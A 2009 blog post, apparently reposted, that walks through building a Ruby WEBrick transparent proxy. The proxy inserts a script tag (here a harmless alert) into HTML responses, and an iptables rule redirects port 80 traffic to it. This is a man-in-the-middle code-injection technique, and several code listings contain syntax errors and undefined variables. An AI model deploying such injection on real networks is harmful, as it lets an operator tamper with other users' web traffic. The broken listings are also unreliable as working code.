WEBrick Transparent Proxy + code injection.

Posted: March 20th, 2009 | Author: FreedomCoder | Filed under: Open Source, Programming | Tags: , , | Comments Off

I've search and search, asked Google, yahoo, sarasa search, and pretty much everyone else I know. Everything was incomplete, not well explain or not in subject at all. After many days of looking I found a japanese site, which I did not understood much of it but after I google translated I was able to check some code and learn how to capture the response body messages.

NOTE: As a word of advice, it is worth mentioning that this situation where only the Japanese have ruby code, has happened several times before with weird and undocumented methods or libraries. So it's always good to look in google.jp for ruby code ;)

You may say why to even bother to do a Transparent proxy in ruby which is able to inject code, well maybe the answer is just because I want to see if I can do it.

I decided to do my PoC with the native library WEBrick, a simple and light HTTPserver among other things.

Simple Proxy :
The first thing I usually do is check the official site and Rdoc for the lib. Unluckily, I was only able to find how to do a normal proxy. and work with the request.

  1. require 'webrick'
  2. require 'webrick/httproxy'
  3.  
  4. WEBrick::HTTPProxyServer.new :P ort 8080,
  5.                      :BindAddress => '0.0.0.0',
  6.                      :ServerType => Thread,
  7.                      :RequestCallback => Proc.new {|req,res|  puts "#{req.unparsed_uri}" }
  8.  
  9. a.start

Simple Proxy server.

Fixing the URI :
With this we can setup Firefox, safari or any other web browser to use the proxy on localhost:8080 and Eureka, we have a proxy that will printout the unparsed_uri for our request.
This in theory works like a charm , but wait. If you see the request Firefox is doing the following

  1. GET http://www.sarasa.com/ HTTP/1.1

Browser request using a proxy server.

Normal the brower when requesting a page , will use HTTP/1.1 and use the header “Host” to specified the url and just connect using a:

  1. GET / HTTP/1.1
  2. Host: www.sarasa.com

Browser request.

Having said this, here is the first wall I encounter. This is something that was undocumented: how do we turn our proxy into a transparent proxy?
The answer is simple. let's modified our code and change the request. All the information is there we just have to re-write it to fit our need.
Before, we start we should know that our req is of type WEBrick::HTTPRequest. Knowing this we will do a little monkey patching to add a new method to the class and

  1. require 'webrick'
  2. require 'webrick/httproxy'
  3.  
  4. class WEBrick::HTTPRequest
  5.   def  update_uri(uri)
  6.     @unparsed_uri = uri
  7.     @request_uri = parse_uri(uri)
  8.   end
  9. end
  10.  
  11.  
  12. req_call = Proc.new do |req,res|  
  13.   req.update_uri()
  14.   puts "#{req.unparsed_uri}" }
  15. end
  16.  
  17. WEBrick::HTTPProxyServer.new :P ort 8080,
  18.                      :BindAddress => '0.0.0.0',
  19.                      :ServerType => Thread,
  20.                      :RequestCallback => req_call
  21.  
  22. a.start

Transparent Proxy Server.

Injecting:
Well, a transparent proxy is cool , but we could do the same with squid or some other product. Let's take it a little further and make it more interesting by adding an inject_payload to our response class.

  1. require 'webrick'
  2. require 'webrick/httproxy'
  3.  
  4. class WEBrick::HTTPRequest
  5.   def  update_uri(uri)
  6.     @unparsed_uri = uri
  7.     @request_uri = parse_uri(uri)
  8.   end
  9. end
  10.  
  11. class WEBrick::HTTPResponse
  12.   def  inject_payload(string)
  13.     if @content_type =~ /html/
  14.       @body.gsub!( /<\/body>/ ,  "<script>#{string}</script></body>")  # this is just
  15.     end
  16.   end
  17. end
  18.  
  19. req_call = Proc.new do |req,res|  
  20.   req.update_uri()
  21.   puts "#{req.unparsed_uri}" }
  22. end
  23.  
  24. res_call = Proc.new do |req,res|  
  25.   res.inject_payload("alert(\"P0wned\");")
  26. end
  27.  
  28. WEBrick::HTTPProxyServer.new :P ort 8080,
  29.                      :BindAddress => '0.0.0.0',
  30.                      :ServerType => Thread,
  31.                      :RequestCallback => req_call
  32.                       :P roxyContentHandler => res_call
  33.  
  34. a.start

Injectable Transparent Proxy server.

Last but not least :
Well, there is one more thing , but this is more at an operating system level we know want to reroute everything that is coming from the port 80 to port 8080 where our transparent proxy is listening. The following example shows a possible way to redirect HTTP traffic assuming that is coming from the interface eth0 and the proxy is listening on port 8080.

  1.  iptables -t nat -A PREROUTING -i  eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080

Now we have a transparent proxy in our hands capable of injecting code into their request.

Enjoy.

(Via 自由編碼人.) Original Link: WEBrick Transparent Proxy + code injection.